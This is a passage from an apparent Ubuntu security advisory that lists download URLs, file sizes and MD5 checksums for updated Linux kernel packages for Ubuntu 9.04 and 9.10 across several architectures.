  Size/MD5:     8874 f173072403f51e6e6da399debd91068f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    47442 e822623d7e4ae0bec0ea5094fed67dcf
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    15656 2b2e6ad08af592fa3106adb4eb16324e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:  1273594 d873a895c58da3fcd5b8a0ea91f9a5ee
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    47204 c80f48bd49fddaae0188cf56350445f8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    72706 dcc76877eef3af00d0280f96cafb6e45
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:   126958 b184498c9d2a598d57e293bc09049cda
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb
  Size/MD5:    13472 1399e0100a81d92448659b83949a62a6

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   215860 fe00a3406a5496e200d5c4e5975469f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    46662 d7a61d1e363f9766795132d3325f02c4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    41352 7d84e783cf7fc4111eaf964395440369
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    47402 2cd024da2955f7e35fe4519c8df5add5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    86924 515a3a07357e06f49b2e4384e2af7b8c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    33578 452adbbc84f5a5218610ddad25eb3ea0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   525752 1a2c59458472f4a18538df9386396703
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   125654 8678d7c3409daf24a373b4d11a0d9263
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    54874 94d4465b06d14b20af5803f2afddf53d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   301338 64a58b9a7ee5d53c2d1a486fe32deb93
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:  3746292 099947b9ddfb625da14b96bf1b9f59e6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-generic_2.6.28-18.59_i386.deb
  Size/MD5:   673824 c36739d12d66db8de4b6e270b1c91464
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18-server_2.6.28-18.59_i386.deb
  Size/MD5:   676398 c7091523d59d0b1cdd4453e12d5983d5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-generic_2.6.28-18.59_i386.deb
  Size/MD5: 24662186 cfa5f52488fb3767debfefaf8940f6b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-server_2.6.28-18.59_i386.deb
  Size/MD5: 24777004 b524e2b45df5e9d30ebc81717b5c62d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-18-virtual_2.6.28-18.59_i386.deb
  Size/MD5: 10250016 09b9af49da34304c1dd280896ce9c0cd
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_i386.deb
  Size/MD5:   766288 4858bc3941dc0e545195c0b911142a4c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   218106 f4f03360ad8e2ee23a58b534e8a2c045
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   174922 fbc6643612c01e91066a87b6ec9c7125
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    30064 c8e4db00aa9c0c3b75c47c103d87b4c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   262814 794c683379e359de14db8806fe984f78
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:  2110070 da3e69dab278584e1abea5ee15d9b47d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   150230 7fc91b8ad535bfb705ba2cb2fc9ff57d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   184326 e505e555ac3bd0c33d00a47f7530f78c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   143584 209207f7e7887594a9d55d17bf1dca76
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    34576 cafc0f5f2db11f69d10e75815d3e9018
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:     5504 21cfbb5c1aa4c8d82bf3e1412646263f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    86018 0dc7720bee90887f4ebf5c71cf93d611
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    47636 fbebe71b83526192c08fd6d797ee8cb1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:     8714 14ed52e8c0a75151dd45acf3cb1ffc34
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    44692 27502a17d5ca35cc31a9fd79ae7d2f1d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    14780 2c9ea91e8d8da2bff76c38a6cdce748d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:  1445966 33fa2ee03c566924552fc5b413e2ccf1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    44098 f740dcb377a692e2ff25a65424431e5b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    69290 a7e3130530005bf8fe4edabe8b003888
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:   119528 a12c1a5bf9a112402d80e8f77ee87a1c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb
  Size/MD5:    12678 6646096dee2575f3bb33510e70bdd52b

lpia architecture (Low Power Intel Architecture):

http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   215260 9a096eefa7f5e423c60fea41c314b9a5
http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    46664 ba3b534d98d6717395ec66b402b3c701
http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    40958 5950f34ca1fbd16f82a42020bc934ec6
http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    47312 0d7d48294720bbd387710d560756ce6a
http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    86530 9e5c38cd42496250d5fcf951c6b5d4bd
http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    33272 a8890faa31cf92122bcce2991374fe7e
http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   523810 7b2a58ca4d024926c0f8101ab49242d6
http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   125252 f48299cd45e2ef1a74017d1c7653976e
http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    63568 135fe854fe31d2d8bd9cd09f40a266e5
http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   300756 77668125ff976eaed45f3d2676a46c5f
http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:  3035296 186cc64995c4fd4404241de5399eb0fb
http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-18-lpia_2.6.28-18.59_lpia.deb
  Size/MD5:   641460 1a4d29b73378acb8bcf88658f88dd08e
http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-18-lpia_2.6.28-18.59_lpia.deb
  Size/MD5: 21796372 d7455e818bf972ef7eb0fe54b7bd96dc
http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-18.59_lpia.deb
  Size/MD5:   766260 b67d9c1432185123449ed6826ed9588d
http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   303982 80fe6dcf6d68a46047ef6ddc2c098614
http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   157406 2cc8f76d83482452bb6073656a80b2ee
http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    24442 28180da41edae2700e4c8a0e4f1c656f
http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   260414 49a0b6bd418a0ff1d274ce8f602e2733
http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:  2027576 241ee9a564502f3d8837806d5e6480d0
http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   149398 b14f79b842c979418dec65e273836cd0
http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   184736 a159624d12831598d35c3b00ba563182
http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   143238 2720ae4f8cdad85066fc888e7fc3c796
http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    34462 582363a3843fdbded2476793775ace76
http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:     5496 67c7245d730a7b241eb9947afeef7669
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    85646 6a31ffe0054c27df1506ae34162ab79e
http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    47402 ff41a000c4a3abbed18330e905a01b7b
http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:     8718 15aa2d8fafced6b6e3b5a24c698b4089
http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    63106 7a967940a04c1ee6a9626258e608b54c
http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    14720 dc899d8630769d6270526c49f99a2af8
http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:  1447832 400eeba1e83569d777954b21b6df593c
http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:    43898 16b0a1310e3f70dccfc8d0d5f971b064
http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   155186 b22b41e37f88fe49531f5580e0f7f712
http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:   172666 df244ff125096be469b1c56a30f1e05f
http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb
  Size/MD5:     8154 f2d765541e008431b4d3eae00f435b61

Updated packages for Ubuntu 9.10:

Source archives:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.dsc
  Size/MD5:     2450 610bb83247876f8a8b47a0fd0d46fae8
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2_2.6.31-304.10.tar.gz
  Size/MD5: 87052080 62b9dcb9ad24e659db1aa085f9e5a456
http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.dsc
  Size/MD5:     1906 a39c7ff46fb3ff74480d0e98366a486d
http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.tar.gz
  Size/MD5: 81902928 c9e88b4f386710c3f22979986a7e3a34
http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.dsc
  Size/MD5:     1943 25176b20de251c2e58bb95e2dd9c1c7b
http://security.ubuntu.com/ubuntu/pool/main/l/linux-mvl-dove/linux-mvl-dove_2.6.31-211.22.tar.gz
  Size/MD5: 82470873 4d5238d3d11105852133d3eb802a95cc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.diff.gz
  Size/MD5:  2811600 b2b44f12a786758d470e6a29c09d0388
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.dsc
  Size/MD5:     3782 ae6bf5844769d00004b919a6f61d588c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31.orig.tar.gz
  Size/MD5: 78278595 16c0355d3612806ef87addf7c9f8c9f9

Architecture independent packages:

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-doc_2.6.31-304.10_all.deb
  Size/MD5:  3790328 e35ab5c36ee1bac625d2a57bd19e0c5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-ec2-source-2.6.31_2.6.31-304.10_all.deb
  Size/MD5: 64258256 70b947cc9e9012c9472f2c317f11ffae
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304_2.6.31-304.10_all.deb
  Size/MD5:  9662096 ac58cebef695901ea01bc7413b79109f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-doc_2.6.31-19.56_all.deb
  Size/MD5:  3791668 3836f273873fedf9d2293ee0d11df6ce
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19_2.6.31-19.56_all.deb
  Size/MD5:  9531414 34d882276f33b0e37135c379a6e1c451
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-source-2.6.31_2.6.31-19.56_all.deb
  Size/MD5: 62161518 9d3f3f79b9f14db8bd3dc68594eb8c8c

amd64 architecture (Athlon64, Opteron, EM64T Xeon):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_amd64.deb
  Size/MD5:   603212 951db7e930eefc5fff9017c56badfb6e
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_amd64.deb
  Size/MD5: 18660056 e39dda7f87b093e927c34a928b842c7a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   221398 682a7dab5b571a7b2fd31f19daf724c1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    15536 55206db30b20aea4d7da38b342fc095d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    52128 1cde23d38ba6908e1123951ef4bc3c69
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    44828 94402e34a45cf232ae86f3cc08bf7f4f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    50072 65e128949b6f525d9028187fe1e7cc37
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    92518 338960088cec6b9b25ef2a96e96f3ebc
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    37776 452d9c073d191ec2be1cad3aceb34490
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   537676 6bb8167794701151c613afe28a5c62c5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   130666 ff5cf8923b89d0fa4b5c3c4a61ef93f7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    53846 ffdc544c68e862a0a3038c99ac2d73a3
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   310118 c2092f9a83a4f59145005f2c451d304b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:  4353666 3a04bb875ae70561075d05d5bb208977
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_amd64.deb
  Size/MD5:   694766 85017cb531a49ea743cb7b30341b5ffa
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-server_2.6.31-19.56_amd64.deb
  Size/MD5:   694938 550a64d6d54ee5f34f1fb9eefbd4cc3e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic_2.6.31-19.56_amd64.deb
  Size/MD5: 28924984 3001e6d36f6bf76621997bdbeb864234
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-server_2.6.31-19.56_amd64.deb
  Size/MD5: 28885946 ff6296f4c684dd9facb011fc51b0b6f0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-virtual_2.6.31-19.56_amd64.deb
  Size/MD5: 11740736 287948976d92a7cae832a34ce33a99b1
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.31-19.56_amd64.deb
  Size/MD5:   743052 35cb9d5d80b77a2586d08ffb65d3212a
http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   168272 fc4758b6b91802971538d3a3c519056d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   202768 73cfe4be43d350582d171ff0e178b6b5
http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    27268 ae850a5e0ba4381a290b8f21ff88737f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   311688 3dab8c023e4aad0df74c5193aeaca49b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:  2282064 f09b0e8828effab3770bfc1da159a8f2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   158666 6765112bf6fed248c08465e47b4dab00
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   203112 fed91a4bc3d356a5a9bb1c6110337413
http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   161072 faec6563ccef41e925482b36619fca7c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    38056 505cbeb1fdbf55eea7664a19dcedc11f
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:     5762 a3ba57f83594477b27886cb3f4bd1b0d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    73750 53978367ed22b3daba246878064b72c2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    22240 8a1036af3dacffb432813cc8422f6ae8
http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:     9548 f1e71c2129cc33f1ff139401b7b81547
http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    39844 48e4aa79753fdb3ce1877ca1817b9fc6
http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    23484 f1be46cb2947ebe6b6d2e5b571d71a35
http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:  1389556 2ba51ea53e5454f75c8b39f21481e45d
http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    47382 89f1dff9282f3c667cf1b8c2bc41353c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    51636 41311bd8c8459ba04789539733e6ff5c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:   128972 9697c034ed2bb74b5d18c5ae31fe1af0
http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb
  Size/MD5:    15814 8f46e8ddd6cac16dbdbc7c89cc94bee0

i386 architecture (x86 compatible Intel/AMD):

http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-headers-2.6.31-304-ec2_2.6.31-304.10_i386.deb
  Size/MD5:   573528 fa913abed6caeb5c33eb2167f730956f
http://security.ubuntu.com/ubuntu/pool/main/l/linux-ec2/linux-image-2.6.31-304-ec2_2.6.31-304.10_i386.deb
  Size/MD5: 17943372 803487f6122441604ec3062e7bb98228
http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   198832 3282a330510666a582f6b8c0269d2f53
http://security.ubuntu.com/ubuntu/pool/main/l/linux/char-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    32458 03e2d90ce28677b7956fa2a72726d02e
http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    49938 c0d1953d9212f1569f04e8c8ba0db7ca
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    42118 db5bcc80727cd1013bc8393df2a88e4c
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    45954 2d497ad958e7e7fc1b57ce51ff6b3570
http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    87386 8e3ab58cf14ac0e97a334a65ae3e42ba
http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    33754 bdbf52c3d681cca0ecdced183d2d37c4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   534176 5f166aa72d31a95df7cdb60abe4a0fc2
http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   128172 821c97524ce74e0685b135140c5261d7
http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:    49748 9423b0562b984b85856d219d7b67fa27
http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:   295726 0736ef03d01a5e5e4fdf284ad2be5409
http://security.ubuntu.com/ubuntu/pool/main/l/linux/kernel-image-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb
  Size/MD5:  4185460 831a6068ef18d08ff697df14dead1668
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-386_2.6.31-19.56_i386.deb
  Size/MD5:   674832 6c28f2a428900b7c3ecd857dd2363150
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb
  Size/MD5:   674164 daade678beff67e96da61f42286bb8d4
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_i386.deb
  Size/MD5:   674252 0786c96b6d902a71c6f1a2e5aa202345
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-386_2.6.31-19.56_i386.deb
  Size/MD5: 28775482 99e9b99d437aa88ec42e838367ca0c3b
http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.31-19-generic-pae_2.6.31-19.56_i386.deb
  Size/MD5: 28938194 19d1d147a9e9dfb49fcd30b9d065d289
